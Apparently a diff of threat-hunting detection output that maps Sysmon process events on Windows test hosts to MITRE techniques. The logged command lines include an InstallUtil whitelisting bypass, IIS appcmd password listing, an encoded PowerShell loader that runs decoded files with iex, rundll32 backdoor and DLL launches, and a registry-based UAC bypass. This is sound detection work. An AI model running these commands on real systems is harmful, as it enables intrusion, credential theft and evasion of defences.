+ cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.964573,2019-05-27T05:29:19.964573+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5973
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:19.924
+ 365ABB72-3D6F-5CEB-0000-001072D7FF00
+ 3640
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564840229.461449,2019-08-03T17:50:29.461449+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5523
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-03 13:50:28.662
+ 747F3D96-9124-5D45-0000-00103B986101
+ 6236
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-56A3-5D45-0000-0020B3D31800
+ 0x18d3b3
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-9124-5D45-0000-001022926101
+ 3180
+ C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe
+ "C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564831398.715586,2019-08-03T15:23:18.715586+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5407
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-03 11:23:17.636
+ 747F3D96-6EA5-5D45-0000-001032CCE100
+ 6068
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-D4E9-5D45-0000-0020E7030000
+ 0x3e7
+ 1
+ System
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6EA5-5D45-0000-00107AC9E100
+ 932
+ C:\Windows\SysWOW64\WerFault.exe
+ C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1558969963.990983,2019-05-27T19:12:43.990983+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /groups ) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6170
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 15:12:38.270
+ 365ABB72-FE66-5CEB-0000-0010C7F80B00
+ 1168
+ C:\Windows\System32\whoami.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ whoami /groups
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-7B40-5CEC-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
+ 365ABB72-FE66-5CEB-0000-001058F50B00
+ 3256
+ C:\Windows\System32\cmd.exe
+ cmd.exe /c whoami /groups
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1628379198.562808,2021-08-08T03:33:18.562808+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 557006
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2021-08-07 23:33:15.285
+ 747F3D96-183B-610F-0000-0010DC6CD400
+ 11324
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-1231-610F-0000-002057A80700
+ 0x7a857
+ 1
+ Medium
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 00000000-0000-0000-0000-000000000000
+ 1108
+ ?
+ ?
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243523
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:17.544
+ 747F3D96-9F61-5E75-0000-001056711E00
+ 7380
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243523
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:17.544
+ 747F3D96-9F61-5E75-0000-001056711E00
+ 7380
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1086 ] Powershell with Suspicious Argument,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32) in event with Command Line ("C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe") and Parent Image :C:\Windows\System32\sysprep\sysprep.exe , Parent CommandLine ("C:\Windows\System32\sysprep\sysprep.exe") in directory : ( C:\Windows\system32\WindowsPowerShell\v1.0\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 17729
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-14 02:32:51.728
+ 365ABB72-28D3-5CDA-0000-001088C71300
+ 3976
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
+ C:\Windows\system32\WindowsPowerShell\v1.0\
+ IEWIN7\IEUser
+ 365ABB72-26E1-5CDA-0000-002045350100
+ 0x13545
+ 1
+ High
+ SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
+ 365ABB72-28D3-5CDA-0000-00106DC31300
+ 3068
+ C:\Windows\System32\sysprep\sysprep.exe
+ "C:\Windows\System32\sysprep\sysprep.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243523
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:17.544
+ 747F3D96-9F61-5E75-0000-001056711E00
+ 7380
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 17729
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-14 02:32:51.728
+ 365ABB72-28D3-5CDA-0000-001088C71300
+ 3976
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
+ C:\Windows\system32\WindowsPowerShell\v1.0\
+ IEWIN7\IEUser
+ 365ABB72-26E1-5CDA-0000-002045350100
+ 0x13545
+ 1
+ High
+ SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
+ 365ABB72-28D3-5CDA-0000-00106DC31300
+ 3068
+ C:\Windows\System32\sysprep\sysprep.exe
+ "C:\Windows\System32\sysprep\sysprep.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 424081
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-23 21:58:17.171
+ 747F3D96-51F9-5F93-0000-001003125E00
+ 7552
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-4690-5F93-0000-002019A60800
+ 0x8a619
+ 1
+ Medium
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 00000000-0000-0000-0000-000000000000
+ 1216
+ ?
+ ?
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 424081
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-23 21:58:17.171
+ 747F3D96-51F9-5F93-0000-001003125E00
+ 7552
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-4690-5F93-0000-002019A60800
+ 0x8a619
+ 1
+ Medium
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 00000000-0000-0000-0000-000000000000
+ 1216
+ ?
+ ?
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 424081
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-23 21:58:17.171
+ 747F3D96-51F9-5F93-0000-001003125E00
+ 7552
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-4690-5F93-0000-002019A60800
+ 0x8a619
+ 1
+ Medium
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 00000000-0000-0000-0000-000000000000
+ 1216
+ ?
+ ?
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.894473,2019-05-27T05:29:19.894473+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5970
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:19.834
+ 365ABB72-3D6F-5CEB-0000-0010B2D3FF00
+ 3848
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF